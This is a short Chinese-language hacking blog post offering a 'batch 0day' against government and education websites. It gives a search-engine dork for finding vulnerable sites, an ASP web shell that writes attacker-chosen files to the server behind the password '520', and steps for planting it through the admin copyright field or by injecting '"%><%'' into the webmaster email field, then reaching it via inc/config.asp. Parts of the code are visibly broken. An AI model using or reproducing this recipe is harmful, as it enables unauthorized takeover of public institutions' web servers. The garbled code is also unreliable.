批量政府教育网站0day
inurl:printpage.asp?ArticleID=
在后台版权信息栏里写入小马
if Request("pass")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "xxxx"
end if
Response.write "
Response.write ""&thisline&"
"
Response.write ""
Response.write ""
Response.end
end if
%>
别跳转任何页面。直接在ie地址栏内将admin/Admin_Login.asp替换成 inc/config.asp?t2ck=520
可以在站长信箱那里写入"%><%' 然后直接连接inc目录下的config.asp
评论
© Hacker 小风's Blog | Powered by LOFTER